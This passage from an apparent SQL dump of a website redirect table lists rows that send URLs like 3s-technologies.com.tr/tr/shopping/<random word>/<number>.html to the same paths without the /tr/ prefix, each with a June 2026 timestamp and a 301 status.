00:00:00',301),(66069,'https://3s-technologies.com.tr/tr/shopping/irradiating/3452118118.html',NULL,'https://3s-technologies.com.tr/shopping/irradiating/3452118118.html','',1,0,'2026-06-10 21:41:05','0000-00-00 00:00:00',301),(66070,'https://3s-technologies.com.tr/tr/shopping/callitriche/1605060404.html',NULL,'https://3s-technologies.com.tr/shopping/callitriche/1605060404.html','',1,0,'2026-06-10 21:41:10','0000-00-00 00:00:00',301),(66071,'https://3s-technologies.com.tr/tr/shopping/fostering/3311539961.html',NULL,'https://3s-technologies.com.tr/shopping/fostering/3311539961.html','',1,0,'2026-06-10 21:41:15','0000-00-00 00:00:00',301),(66072,'https://3s-technologies.com.tr/tr/shopping/hutch/496912446.html',NULL,'https://3s-technologies.com.tr/shopping/hutch/496912446.html','',1,0,'2026-06-10 21:41:21','0000-00-00 00:00:00',301),(66073,'https://3s-technologies.com.tr/tr/shopping/lusus/1951187046.html',NULL,'https://3s-technologies.com.tr/shopping/lusus/1951187046.html','',1,0,'2026-06-10 21:41:25','0000-00-00 00:00:00',301),(66074,'https://3s-technologies.com.tr/tr/shopping/abnegator/151812827.html',NULL,'https://3s-technologies.com.tr/shopping/abnegator/151812827.html','',1,0,'2026-06-10 21:41:33','0000-00-00 00:00:00',301),(66075,'https://3s-technologies.com.tr/tr/shopping/skimitry/2329253504.html',NULL,'https://3s-technologies.com.tr/shopping/skimitry/2329253504.html','',1,0,'2026-06-10 21:41:40','0000-00-00 00:00:00',301),(66076,'https://3s-technologies.com.tr/tr/shopping/vermiparous/1193292913.html',NULL,'https://3s-technologies.com.tr/shopping/vermiparous/1193292913.html','',1,0,'2026-06-10 21:41:45','0000-00-00 00:00:00',301),(66077,'https://3s-technologies.com.tr/tr/shopping/bobolink/1250370689.html',NULL,'https://3s-technologies.com.tr/shopping/bobolink/1250370689.html','',1,0,'2026-06-10 21:41:51','0000-00-00 00:00:00',301),(66078,'https://3s-technologies.com.tr/tr/shopping/disproportionableness/3117268506.html',NULL,'https://3s-technologies.com.tr/shopping/disproportionableness/3117268506.html','',1,0,'2026-06-10 21:41:55','0000-00-00 00:00:00',301),(66079,'https://3s-technologies.com.tr/tr/shopping/astragaloid/1692319932.html',NULL,'https://3s-technologies.com.tr/shopping/astragaloid/1692319932.html','',1,0,'2026-06-10 21:42:05','0000-00-00 00:00:00',301),(66080,'https://3s-technologies.com.tr/tr/shopping/testimony/3118480621.html',NULL,'https://3s-technologies.com.tr/shopping/testimony/3118480621.html','',1,0,'2026-06-10 21:42:07','0000-00-00 00:00:00',301),(66081,'https://3s-technologies.com.tr/tr/shopping/megalo/3210466374.html',NULL,'https://3s-technologies.com.tr/shopping/megalo/3210466374.html','',1,0,'2026-06-10 21:42:12','0000-00-00 00:00:00',301),(66082,'https://3s-technologies.com.tr/tr/shopping/reassemble/2165192344.html',NULL,'https://3s-technologies.com.tr/shopping/reassemble/2165192344.html','',1,0,'2026-06-10 21:42:17','0000-00-00 00:00:00',301),(66083,'https://3s-technologies.com.tr/tr/shopping/aloft/2546723051.html',NULL,'https://3s-technologies.com.tr/shopping/aloft/2546723051.html','',1,0,'2026-06-10 21:42:22','0000-00-00 00:00:00',301),(66084,'https://3s-technologies.com.tr/tr/shopping/misfeasance/4163059927.html',NULL,'https://3s-technologies.com.tr/shopping/misfeasance/4163059927.html','',1,0,'2026-06-10 21:42:31','0000-00-00 00:00:00',301),(66085,'https://3s-technologies.com.tr/tr/shopping/lubricator/1637273010.html',NULL,'https://3s-technologies.com.tr/shopping/lubricator/1637273010.html','',1,0,'2026-06-10 21:42:35','0000-00-00 00:00:00',301),(66086,'https://3s-technologies.com.tr/tr/shopping/ethylidene/932418824.html',NULL,'https://3s-technologies.com.tr/shopping/ethylidene/932418824.html','',1,0,'2026-06-10 21:42:40','0000-00-00 00:00:00',301),(66087,'https://3s-technologies.com.tr/tr/shopping/plasmature/1512977460.html',NULL,'https://3s-technologies.com.tr/shopping/plasmature/1512977460.html','',1,0,'2026-06-10 21:42:45','0000-00-00 00:00:00',301),(66088,'https://3s-technologies.com.tr/tr/shopping/confuter/1011295604.html',NULL,'https://3s-technologies.com.tr/shopping/confuter/1011295604.html','',1,0,'2026-06-10 21:42:50','0000-00-00 00:00:00',301),(66089,'https://3s-technologies.com.tr/tr/shopping/incited/3092324479.html',NULL,'https://3s-technologies.com.tr/shopping/incited/3092324479.html','',1,0,'2026-06-10 21:42:55','0000-00-00 00:00:00',301),(66090,'https://3s-technologies.com.tr/tr/shopping/rhusma/3291251844.html',NULL,'https://3s-technologies.com.tr/shopping/rhusma/3291251844.html','',1,0,'2026-06-10 21:43:00','0000-00-00 00:00:00',301),(66091,'https://3s-technologies.com.tr/tr/shopping/earbored/2729757860.html',NULL,'https://3s-technologies.com.tr/shopping/earbored/2729757860.html','',1,0,'2026-06-10 21:43:05','0000-00-00 00:00:00',301),(66092,'https://3s-technologies.com.tr/tr/shopping/priesthood/245010679.html',NULL,'https://3s-technologies.com.tr/shopping/priesthood/245010679.html','',1,0,'2026-06-10 21:43:10','0000-00-00 00:00:00',301),(66093,'https://3s-technologies.com.tr/tr/shopping/overstory/1340736655.html',NULL,'https://3s-technologies.com.tr/shopping/overstory/1340736655.html','',1,0,'2026-06-10 21:43:15','0000-00-00 00:00:00',301),(66094,'https://3s-technologies.com.tr/tr/shopping/melierax/2871675417.html',NULL,'https://3s-technologies.com.tr/shopping/melierax/2871675417.html','',1,0,'2026-06-10 21:43:20','0000-00-00 00:00:00',301),(66095,'https://3s-technologies.com.tr/tr/shopping/creep/1567925024.html',NULL,'https://3s-technologies.com.tr/shopping/creep/1567925024.html','',1,0,'2026-06-10 21:43:25','0000-00-00 00:00:00',301),(66096,'https://3s-technologies.com.tr/tr/shopping/mammee/280261598.html',NULL,'https://3s-technologies.com.tr/shopping/mammee/280261598.html','',1,0,'2026-06-10 21:43:30','0000-00-00 00:00:00',301),(66097,'https://3s-technologies.com.tr/tr/shopping/sightsmen/1225857842.html',NULL,'https://3s-technologies.com.tr/shopping/sightsmen/1225857842.html','',1,0,'2026-06-10 21:43:35','0000-00-00 00:00:00',301),(66098,'https://3s-technologies.com.tr/tr/shopping/ladinos/933074016.html',NULL,'https://3s-technologies.com.tr/shopping/ladinos/933074016.html','',1,0,'2026-06-10 21:43:44','0000-00-00 00:00:00',301),(66099,'https://3s-technologies.com.tr/tr/shopping/obliqua/3193718469.html',NULL,'https://3s-technologies.com.tr/shopping/obliqua/3193718469.html','',1,0,'2026-06-10 21:43:48','0000-00-00 00:00:00',301),(66100,'https://3s-technologies.com.tr/tr/shopping/storyteller/787088356.html',NULL,'https://3s-technologies.com.tr/shopping/storyteller/787088356.html','',1,0,'2026-06-10 21:43:53','0000-00-00 00:00:00',301),(66101,'https://3s-technologies.com.tr/tr/shopping/admirance/234668611.html',NULL,'https://3s-technologies.com.tr/shopping/admirance/234668611.html','',1,0,'2026-06-10 21:43:57','0000-00-00 00:00:00',301),(66102,'https://3s-technologies.com.tr/tr/shopping/distichodus/2213388713.html',NULL,'https://3s-technologies.com.tr/shopping/distichodus/2213388713.html','',1,0,'2026-06-10 21:44:02','0000-00-00 00:00:00',301),(66103,'https://3s-technologies.com.tr/tr/shopping/astuta/2492185900.html',NULL,'https://3s-technologies.com.tr/shopping/astuta/2492185900.html','',1,0,'2026-06-10 21:44:08','0000-00-00 00:00:00',301),(66104,'https://3s-technologies.com.tr/tr/shopping/spilikin/2877132052.html',NULL,'https://3s-technologies.com.tr/shopping/spilikin/2877132052.html','',1,0,'2026-06-10 21:44:13','0000-00-00 00:00:00',301),(66105,'https://3s-technologies.com.tr/tr/shopping/benzyl/1193849836.html',NULL,'https://3s-technologies.com.tr/shopping/benzyl/1193849836.html','',1,0,'2026-06-10 21:44:17','0000-00-00 00:00:00',301),(66106,'https://3s-technologies.com.tr/tr/shopping/unilocular/2439364983.html',NULL,'https://3s-technologies.com.tr/shopping/unilocular/2439364983.html','',1,0,'2026-06-10 21:44:22','0000-00-00 00:00:00',301),(66107,'https://3s-technologies.com.tr/tr/shopping/helicine/3619652036.html',NULL,'https://3s-technologies.com.tr/shopping/helicine/3619652036.html','',1,0,'2026-06-10 21:44:27','0000-00-00 00:00:00',301),(66108,'https://3s-technologies.com.tr/tr/shopping/flourishingly/2287021529.html',NULL,'https://3s-technologies.com.tr/shopping/flourishingly/2287021529.html','',1,0,'2026-06-10 21:44:32','0000-00-00 00:00:00',301),(66109,'https://3s-technologies.com.tr/tr/shopping/laocoon/1561059439.html',NULL,'https://3s-technologies.com.tr/shopping/laocoon/1561059439.html','',1,0,'2026-06-10 21:44:39','0000-00-00 00:00:00',301),(66110,'https://3s-technologies.com.tr/tr/shopping/andrenidae/3919565080.html',NULL,'https://3s-technologies.com.tr/shopping/andrenidae/3919565080.html','',1,0,'2026-06-10 21:44:44','0000-00-00 00:00:00',301),(66111,'https://3s-technologies.com.tr/tr/shopping/bullfaced/671341712.html',NULL,'https://3s-technologies.com.tr/shopping/bullfaced/671341712.html','',1,0,'2026-06-10 21:44:48','0000-00-00 00:00:00',301),(66112,'https://3s-technologies.com.tr/tr/shopping/gutturine/1462058065.html',NULL,'https://3s-technologies.com.tr/shopping/gutturine/1462058065.html','',1,0,'2026-06-10 21:44:53','0000-00-00 00:00:00',301),(66113,'https://3s-technologies.com.tr/tr/shopping/stockbroker/1572041399.html',NULL,'https://3s-technologies.com.tr/shopping/stockbroker/1572041399.html','',1,0,'2026-06-10 21:44:59','0000-00-00 00:00:00',301),(66114,'https://3s-technologies.com.tr/tr/shopping/unstriated/938219727.html',NULL,'https://3s-technologies.com.tr/shopping/unstriated/938219727.html','',1,0,'2026-06-10 21:45:03','0000-00-00 00:00:00',301),(66115,'https://3s-technologies.com.tr/tr/shopping/verecund/553312347.html',NULL,'https://3s-technologies.com.tr/shopping/verecund/553312347.html','',1,0,'2026-06-10 21:45:08','0000-00-00 00:00:00',301),(66116,'https://3s-technologies.com.tr/tr/shopping/urethrotomy/1981423411.html',NULL,'https://3s-technologies.com.tr/shopping/urethrotomy/1981423411.html','',1,0,'2026-06-10 21:45:13','0000-00-00 00:00:00',301),(66117,'https://3s-technologies.com.tr/tr/shopping/lammergeir/2083405922.html',NULL,'https://3s-technologies.com.tr/shopping/lammergeir/2083405922.html','',1,0,'2026-06-10 21:45:18','0000-00-00 00:00:00',301),(66118,'https://3s-technologies.com.tr/tr/shopping/penicillins/2576566451.html',NULL,'https://3s-technologies.com.tr/shopping/penicillins/2576566451.html','',1,0,'2026-06-10 21:45:23','0000-00-00 00:00:00',301),(66119,'https://3s-technologies.com.tr/tr/shopping/gangliate/591907993.html',NULL,'https://3s-technologies.com.tr/shopping/gangliate/591907993.html','',1,0,'2026-06-10 21:45:28','0000-00-00 00:00:00',301),(66120,'https://3s-technologies.com.tr/tr/shopping/filamentosa/2579712495.html',NULL,'https://3s-technologies.com.tr/shopping/filamentosa/2579712495.html','',1,0,'2026-06-10 21:45:33','0000-00-00 00:00:00',301),(66121,'https://3s-technologies.com.tr/tr/shopping/tumblers/2220618912.html',NULL,'https://3s-technologies.com.tr/shopping/tumblers/2220618912.html','',1,0,'2026-06-10 21:45:39','0000-00-00 00:00:00',301),(66122,'https://3s-technologies.com.tr/tr/shopping/anorthosite/3122499837.html',NULL,'https://3s-technologies.com.tr/shopping/anorthosite/3122499837.html','',1,0,'2026-06-10 21:45:44','0000-00-00 00:00:00',301),(66123,'https://3s-technologies.com.tr/tr/shopping/majestic/4048019498.html',NULL,'https://3s-technologies.com.tr/shopping/majestic/4048019498.html','',1,0,'2026-06-10 21:45:49','0000-00-00 00:00:00',301),(66124,'https://3s-technologies.com.tr/tr/shopping/quinoxaline/2368373562.html',NULL,'https://3s-technologies.com.tr/shopping/quinoxaline/2368373562.html','',1,0,'2026-06-10 21:45:54','0000-00-00 00:00:00',301),(66125,'https://3s-technologies.com.tr/tr/shopping/nephralgia/3103932684.html',NULL,'https://3s-technologies.com.tr/shopping/nephralgia/3103932684.html','',1,0,'2026-06-10 21:45:59','0000-00-00 00:00:00',301),(66126,'https://3s-technologies.com.tr/tr/shopping/cruentous/3172695074.html',NULL,'https://3s-technologies.com.tr/shopping/cruentous/3172695074.html','',1,0,'2026-06-10 21:46:04','0000-00-00 00:00:00',301),(66127,'https://3s-technologies.com.tr/tr/shopping/rhipipter/1591561043.html',NULL,'https://3s-technologies.com.tr/shopping/rhipipter/1591561043.html','',1,0,'2026-06-10 21:46:09','0000-00-00 00:00:00',301),(66128,'https://3s-technologies.com.tr/tr/shopping/merchantman/3742142060.html',NULL,'https://3s-technologies.com.tr/shopping/merchantman/3742142060.html','',1,0,'2026-06-10 21:46:14','0000-00-00 00:00:00',301),(66129,'https://3s-technologies.com.tr/tr/shopping/dianoetic/2479172744.html',NULL,'https://3s-technologies.com.tr/shopping/dianoetic/2479172744.html','',1,0,'2026-06-10 21:46:19','0000-00-00 00:00:00',301),(66130,'https://3s-technologies.com.tr/tr/shopping/sterhydraulic/1810167462.html',NULL,'https://3s-technologies.com.tr/shopping/sterhydraulic/1810167462.html','',1,0,'2026-06-10 21:46:24','0000-00-00 00:00:00',301),(66131,'https://3s-technologies.com.tr/tr/shopping/teeuck/2841732002.html',NULL,'https://3s-technologies.com.tr/shopping/teeuck/2841732002.html','',1,0,'2026-06-10 21:46:31','0000-00-00 00:00:00',301),(66132,'https://3s-technologies.com.tr/tr/shopping/confounding/869372313.html',NULL,'https://3s-technologies.com.tr/shopping/confounding/869372313.html','',1,0,'2026-06-10 21:46:35','0000-00-00 00:00:00',301),(66133,'https://3s-technologies.com.tr/tr/shopping/timeously/1966407563.html',NULL,'https://3s-technologies.com.tr/shopping/timeously/1966407563.html','',1,0,'2026-06-10 21:46:40','0000-00-00 00:00:00',301),(66134,'https://3s-technologies.com.tr/tr/shopping/profluent/167033328.html',NULL,'https://3s-technologies.com.tr/shopping/profluent/167033328.html','',1,0,'2026-06-10 21:46:45','0000-00-00 00:00:00',301),(66135,'https://3s-technologies.com.tr/tr/shopping/simulator/403188143.html',NULL,'https://3s-technologies.com.tr/shopping/simulator/403188143.html','',1,0,'2026-06-10 21:46:50','0000-00-00 00:00:00',301),(66136,'https://3s-technologies.com.tr/tr/shopping/budding/359625970.html',NULL,'https://3s-technologies.com.tr/shopping/budding/359625970.html','',1,0,'2026-06-10 21:46:55','0000-00-00 00:00:00',301),(66137,'https://3s-technologies.com.tr/tr/shopping/knapped/3352311290.html',NULL,'https://3s-technologies.com.tr/shopping/knapped/3352311290.html','',1,0,'2026-06-10 21:47:00','0000-00-00 00:00:00',301),(66138,'https://3s-technologies.com.tr/tr/shopping/halpace/1444013053.html',NULL,'https://3s-technologies.com.tr/shopping/halpace/1444013053.html','',1,0,'2026-06-10 21:47:05','0000-00-00 00:00:00',301),(66139,'https://3s-technologies.com.tr/tr/shopping/intercrossing/1251256872.html',NULL,'https://3s-technologies.com.tr/shopping/intercrossing/1251256872.html','',1,0,'2026-06-10 21:47:18','0000-00-00 00:00:00',301),(66140,'https://3s-technologies.com.tr/tr/shopping/postscribe/2853286153.html',NULL,'https://3s-technologies.com.tr/shopping/postscribe/2853286153.html','',1,0,'2026-06-10 21:47:22','0000-00-00 00:00:00',301),(66141,'https://3s-technologies.com.tr/tr/shopping/snatching/1437160843.html',NULL,'https://3s-technologies.com.tr/shopping/snatching/1437160843.html','',1,0,'2026-06-10 21:47:27','0000-00-00 00:00:00',301),(66142,'https://3s-technologies.com.tr/tr/shopping/vintry/1140257577.html',NULL,'https://3s-technologies.com.tr/shopping/vintry/1140257577.html','',1,0,'2026-06-10 21:47:32','0000-00-00 00:00:00',301),(66143,'https://3s-technologies.com.tr/tr/shopping/physeteridae/2879211650.html',NULL,'https://3s-technologies.com.tr/shopping/physeteridae/2879211650.html','',1,0,'2026-06-10 21:47:37','0000-00-00 00:00:00',301),(66144,'https://3s-technologies.com.tr/tr/shopping/potential/643837486.html',NULL,'https://3s-technologies.com.tr/shopping/potential/643837486.html','',1,0,'2026-06-10 21:47:42','0000-00-00 00:00:00',301),(66145,'https://3s-technologies.com.tr/tr/shopping/subworker/4273592532.html',NULL,'https://3s-technologies.com.tr/shopping/subworker/4273592532.html','',1,0,'2026-06-10 21:47:48','0000-00-00 00:00:00',301),(66146,'https://3s-technologies.com.tr/tr/shopping/backlog/1703853766.html',NULL,'https://3s-technologies.com.tr/shopping/backlog/1703853766.html','',1,0,'2026-06-10 21:47:52','0000-00-00 00:00:00',301),(66147,'https://3s-technologies.com.tr/tr/shopping/bilanders/1707393978.html',NULL,'https://3s-technologies.com.tr/shopping/bilanders/1707393978.html','',1,0,'2026-06-10 21:47:57','0000-00-00 00:00:00',301),(66148,'https://3s-technologies.com.tr/tr/shopping/shaghaired/3552016753.html',NULL,'https://3s-technologies.com.tr/shopping/shaghaired/3552016753.html','',1,0,'2026-06-10 21:48:02','0000-00-00 00:00:00',301),(66149,'https://3s-technologies.com.tr/tr/shopping/parson/2188050080.html',NULL,'https://3s-technologies.com.tr/shopping/parson/2188050080.html','',1,0,'2026-06-10 21:48:07','0000-00-00 00:00:00',301),(66150,'https://3s-technologies.com.tr/tr/shopping/spitously/2169859663.html',NULL,'https://3s-technologies.com.tr/shopping/spitously/2169859663.html','',1,0,'2026-06-10 21:48:12','0000-00-00 00:00:00',301),(66151,'https://3s-technologies.com.tr/tr/shopping/jambee/500367650.html',NULL,'https://3s-technologies.com.tr/shopping/jambee/500367650.html','',1,0,'2026-06-10 21:48:17','0000-00-00 00:00:00',301),(66152,'https://3s-technologies.com.tr/tr/shopping/wango/3370159112.html',NULL,'https://3s-technologies.com.tr/shopping/wango/3370159112.html','',1,0,'2026-06-10 21:48:21','0000-00-00 00:00:00',301),(66153,'https://3s-technologies.com.tr/tr/shopping/redlegged/2460175241.html',NULL,'https://3s-technologies.com.tr/shopping/redlegged/2460175241.html','',1,0,'2026-06-10 21:48:26','0000-00-00 00:00:00',301),(66154,'https://3s-technologies.com.tr/tr/shopping/protense/137567619.html',NULL,'https://3s-technologies.com.tr/shopping/protense/137567619.html','',1,0,'2026-06-10 21:48:31','0000-00-00 00:00:00',301),(66155,'https://3s-technologies.com.tr/tr/shopping/arcade/862455412.html',NULL,'https://3s-technologies.com.tr/shopping/arcade/862455412.html','',1,0,'2026-06-10 21:48:36','0000-00-00 00:00:00',301),(66156,'https://3s-technologies.com.tr/tr/shopping/calidity/4020806956.html',NULL,'https://3s-technologies.com.tr/shopping/calidity/4020806956.html','',1,0,'2026-06-10 21:48:41','0000-00-00 00:00:00',301),(66157,'https://3s-technologies.com.tr/tr/shopping/abstaining/714700746.html',NULL,'https://3s-technologies.com.tr/shopping/abstaining/714700746.html','',1,0,'2026-06-10 21:48:46','0000-00-00 00:00:00',301),(66158,'https://3s-technologies.com.tr/tr/shopping/impliedly/1930372510.html',NULL,'https://3s-technologies.com.tr/shopping/impliedly/1930372510.html','',1,0,'2026-06-10 21:48:51','0000-00-00 00:00:00',301),(66159,'https://3s-technologies.com.tr/tr/shopping/conscientiousness/321589834.html',NULL,'https://3s-technologies.com.tr/shopping/conscientiousness/321589834.html','',1,0,'2026-06-10 21:49:02','0000-00-00 00:00:00',301),(66160,'https://3s-technologies.com.tr/tr/shopping/subdivided/2299654309.html',NULL,'https://3s-technologies.com.tr/shopping/subdivided/2299654309.html','',1,0,'2026-06-10 21:49:04','0000-00-00 00:00:00',301),(66161,'https://3s-technologies.com.tr/tr/shopping/tarantulated/3259884110.html',NULL,'https://3s-technologies.com.tr/shopping/tarantulated/3259884110.html','',1,0,'2026-06-10 21:49:09','0000-00-00 00:00:00',301),(66162,'https://3s-technologies.com.tr/tr/shopping/cricketer/3385531395.html',NULL,'https://3s-technologies.com.tr/shopping/cricketer/3385531395.html','',1,0,'2026-06-10 21:49:14','0000-00-00 00:00:00',301),(66163,'https://3s-technologies.com.tr/tr/shopping/devilish/1200681729.html',NULL,'https://3s-technologies.com.tr/shopping/devilish/1200681729.html','',1,0,'2026-06-10 21:49:19','0000-00-00 00:00:00',301),(66164,'https://3s-technologies.com.tr/tr/shopping/citillus/1495029623.html',NULL,'https://3s-technologies.com.tr/shopping/citillus/1495029623.html','',1,0,'2026-06-10 21:49:24','0000-00-00 00:00:00',301),(66165,'https://3s-technologies.com.tr/tr/shopping/phonologic/3253195423.html',NULL,'https://3s-technologies.com.tr/shopping/phonologic/3253195423.html','',1,0,'2026-06-10 21:49:30','0000-00-00 00:00:00',301),(66166,'https://3s-technologies.com.tr/tr/shopping/perch/1832695953.html',NULL,'https://3s-technologies.com.tr/shopping/perch/1832695953.html','',1,0,'2026-06-10 21:49:34','0000-00-00 00:00:00',301),(66167,'https://3s-technologies.com.tr/tr/shopping/epistle/191418436.html',NULL,'https://3s-technologies.com.tr/shopping/epistle/191418436.html','',1,0,'2026-06-10 21:49:40','0000-00-00 00:00:00',301),(66168,'https://3s-technologies.com.tr/tr/shopping/suberization/2143416776.html',NULL,'https://3s-technologies.com.tr/shopping/suberization/2143416776.html','',1,0,'2026-06-10 21:49:45','0000-00-00 00:00:00',301),(66169,'https://3s-technologies.com.tr/tr/shopping/green/1148828004.html',NULL,'https://3s-technologies.com.tr/shopping/green/1148828004.html','',1,0,'2026-06-10 21:49:50','0000-00-00 00:00:00',301),(66170,'https://3s-technologies.com.tr/tr/shopping/equivalent/3285973098.html',NULL,'https://3s-technologies.com.tr/shopping/equivalent/3285973098.html','',1,0,'2026-06-10 21:49:55','0000-00-00 00:00:00',301),(66171,'https://3s-technologies.com.tr/tr/shopping/lignorum/704358678.html',NULL,'https://3s-technologies.com.tr/shopping/lignorum/704358678.html','',1,0,'2026-06-10 21:50:02','0000-00-00 00:00:00',301),(66172,'https://3s-technologies.com.tr/tr/shopping/doffer/1761886085.html',NULL,'https://3s-technologies.com.tr/shopping/doffer/1761886085.html','',1,0,'2026-06-10 21:50:06','0000-00-00 00:00:00',301),(66173,'https://3s-technologies.com.tr/tr/shopping/alphabetic/2242997628.html',NULL,'https://3s-technologies.com.tr/shopping/alphabetic/2242997628.html','',1,0,'2026-06-10 21:50:11','0000-00-00 00:00:00',301),(66174,'https://3s-technologies.com.tr/tr/shopping/prohibitory/417394722.html',NULL,'https://3s-technologies.com.tr/shopping/prohibitory/417394722.html','',1,0,'2026-06-10 21:50:16','0000-00-00 00:00:00',301),(66175,'https://3s-technologies.com.tr/tr/shopping/impalatable/2224038738.html',NULL,'https://3s-technologies.com.tr/shopping/impalatable/2224038738.html','',1,0,'2026-06-10 21:50:21','0000-00-00 00:00:00',301),(66176,'https://3s-technologies.com.tr/tr/shopping/yellowpoll/352612968.html',NULL,'https://3s-technologies.com.tr/shopping/yellowpoll/352612968.html','',1,0,'2026-06-10 21:50:26','0000-00-00 00:00:00',301),(66177,'https://3s-technologies.com.tr/tr/shopping/broadleaf/2677644788.html',NULL,'https://3s-technologies.com.tr/shopping/broadleaf/2677644788.html','',1,0,'2026-06-10 21:50:31','0000-00-00 00:00:00',301),(66178,'https://3s-technologies.com.tr/tr/shopping/redly/2624742503.html',NULL,'https://3s-technologies.com.tr/shopping/redly/2624742503.html','',1,0,'2026-06-10 21:50:36','0000-00-00 00:00:00',301),(66179,'https://3s-technologies.com.tr/tr/shopping/beach/1151369346.html',NULL,'https://3s-technologies.com.tr/shopping/beach/1151369346.html','',1,0,'2026-06-10 21:50:41','0000-00-00 00:00:00',301),(66180,'https://3s-technologies.com.tr/tr/shopping/estimative/3709294337.html',NULL,'https://3s-technologies.com.tr/shopping/estimative/3709294337.html','',1,0,'2026-06-10 21:50:46','0000-00-00 00:00:00',301),(66181,'https://3s-technologies.com.tr/tr/shopping/befogged/1884763846.html',NULL,'https://3s-technologies.com.tr/shopping/befogged/1884763846.html','',1,0,'2026-06-10 21:50:51','0000-00-00 00:00:00',301),(66182,'https://3s-technologies.com.tr/tr/shopping/casebook/2127880970.html',NULL,'https://3s-technologies.com.tr/shopping/casebook/2127880970.html','',1,0,'2026-06-10 21:50:56','0000-00-00 00:00:00',301),(66183,'https://3s-technologies.com.tr/tr/shopping/anonymously/758701292.html',NULL,'https://3s-technologies.com.tr/shopping/anonymously/758701292.html','',1,0,'2026-06-10 21:51:01','0000-00-00 00:00:00',301),(66184,'https://3s-technologies.com.tr/tr/shopping/deformity/1348487072.html',NULL,'https://3s-technologies.com.tr/shopping/deformity/1348487072.html','',1,0,'2026-06-10 21:51:06','0000-00-00 00:00:00',301),(66185,'https://3s-technologies.com.tr/tr/shopping/washed/1534720272.html',NULL,'https://3s-technologies.com.tr/shopping/washed/1534720272.html','',1,0,'2026-06-10 21:51:14','0000-00-00 00:00:00',301),(66186,'https://3s-technologies.com.tr/tr/shopping/linear/1513760315.html',NULL,'https://3s-technologies.com.tr/shopping/linear/1513760315.html','',1,0,'2026-06-10 21:51:18','0000-00-00 00:00:00',301),(66187,'https://3s-technologies.com.tr/tr/shopping/backslid/3056431993.html',NULL,'https://3s-technologies.com.tr/shopping/backslid/3056431993.html','',1,0,'2026-06-10 21:51:23','0000-00-00 00:00:00',301),(66188,'https://3s-technologies.com.tr/tr/shopping/assistor/3308750104.html',NULL,'https://3s-technologies.com.tr/shopping/assistor/3308750104.html','',1,0,'2026-06-10 21:51:28','0000-00-00 00:00:00',301),(66189,'https://3s-technologies.com.tr/tr/shopping/blackhaired/1485311804.html',NULL,'https://3s-technologies.com.tr/shopping/blackhaired/1485311804.html','',1,0,'2026-06-10 21:51:33','0000-00-00 00:00:00',301),(66190,'https://3s-technologies.com.tr/tr/shopping/minder/1095437897.html',NULL,'https://3s-technologies.com.tr/shopping/minder/1095437897.html','',1,0,'2026-06-10 21:51:38','0000-00-00 00:00:00',301),(66191,'https://3s-technologies.com.tr/tr/shopping/acquisition/648589781.html',NULL,'https://3s-technologies.com.tr/shopping/acquisition/648589781.html','',1,0,'2026-06-10 21:51:49','0000-00-00 00:00:00',301),(66192,'https://3s-technologies.com.tr/tr/shopping/torrify/1035151674.html',NULL,'https://3s-technologies.com.tr/shopping/torrify/1035151674.html','',1,0,'2026-06-10 21:51:52','0000-00-00 00:00:00',301),(66193,'https://3s-technologies.com.tr/tr/shopping/floss/29685421.html',NULL,'https://3s-technologies.com.tr/shopping/floss/29685421.html','',1,0,'2026-06-10 21:51:57','0000-00-00 00:00:00',301),(66194,'https://3s-technologies.com.tr/tr/shopping/deducement/3184357069.html',NULL,'https://3s-technologies.com.tr/shopping/deducement/3184357069.html','',1,0,'2026-06-10 21:52:02','0000-00-00 00:00:00',301),(66195,'https://3s-technologies.com.tr/tr/shopping/contractibility/20490745.html',NULL,'https://3s-technologies.com.tr/shopping/contractibility/20490745.html','',1,0,'2026-06-10 21:52:07','0000-00-00 00:00:00',301),(66196,'https://3s-technologies.com.tr/tr/shopping/chunky/2789452947.html',NULL,'https://3s-technologies.com.tr/shopping/chunky/2789452947.html','',1,0,'2026-06-10 21:52:12','0000-00-00 00:00:00',301),(66197,'https://3s-technologies.com.tr/tr/shopping/ectosarc/1278999402.html',NULL,'https://3s-technologies.com.tr/shopping/ectosarc/1278999402.html','',1,0,'2026-06-10 21:52:17','0000-00-00 00:00:00',301),(66198,'https://3s-technologies.com.tr/tr/shopping/cephalin/3342739894.html',NULL,'https://3s-technologies.com.tr/shopping/cephalin/3342739894.html','',1,0,'2026-06-10 21:52:22','0000-00-00 00:00:00',301),(66199,'https://3s-technologies.com.tr/tr/shopping/picket/3522615735.html',NULL,'https://3s-technologies.com.tr/shopping/picket/3522615735.html','',1,0,'2026-06-10 21:52:27','0000-00-00 00:00:00',301),(66200,'https://3s-technologies.com.tr/tr/shopping/supercharging/3472928376.html',NULL,'https://3s-technologies.com.tr/shopping/supercharging/3472928376.html','',1,0,'2026-06-10 21:52:32','0000-00-00 00:00:00',301),(66201,'https://3s-technologies.com.tr/tr/shopping/bactrianus/3060085390.html',NULL,'https://3s-technologies.com.tr/shopping/bactrianus/3060085390.html','',1,0,'2026-06-10 21:52:37','0000-00-00 00:00:00',301),(66202,'https://3s-technologies.com.tr/tr/shopping/fraxoside/3606359335.html',NULL,'https://3s-technologies.com.tr/shopping/fraxoside/3606359335.html','',1,0,'2026-06-10 21:52:42','0000-00-00 00:00:00',301),(66203,'https://3s-technologies.com.tr/tr/shopping/veinstuff/940513493.html',NULL,'https://3s-technologies.com.tr/shopping/veinstuff/940513493.html','',1,0,'2026-06-10 21:52:52','0000-00-00 00:00:00',301),(66204,'https://3s-technologies.com.tr/tr/shopping/regulated/2622154798.html',NULL,'https://3s-technologies.com.tr/shopping/regulated/2622154798.html','',1,0,'2026-06-10 21:52:54','0000-00-00 00:00:00',301),(66205,'https://3s-technologies.com.tr/tr/shopping/stairhead/1144239232.html',NULL,'https://3s-technologies.com.tr/shopping/stairhead/1144239232.html','',1,0,'2026-06-10 21:52:59','0000-00-00 00:00:00',301),(66206,'https://3s-technologies.com.tr/tr/shopping/securifera/985333173.html',NULL,'https://3s-technologies.com.tr/shopping/securifera/985333173.html','',1,0,'2026-06-10 21:53:04','0000-00-00 00:00:00',301),(66207,'https://3s-technologies.com.tr/tr/shopping/misus/2849810632.html',NULL,'https://3s-technologies.com.tr/shopping/misus/2849810632.html','',1,0,'2026-06-10 21:53:09','0000-00-00 00:00:00',301),(66208,'https://3s-technologies.com.tr/tr/shopping/deistic/3413603186.html',NULL,'https://3s-technologies.com.tr/shopping/deistic/3413603186.html','',1,0,'2026-06-10 21:53:14','0000-00-00 00:00:00',301),(66209,'https://3s-technologies.com.tr/tr/shopping/casava/3041354698.html',NULL,'https://3s-technologies.com.tr/shopping/casava/3041354698.html','',1,0,'2026-06-10 21:53:22','0000-00-00 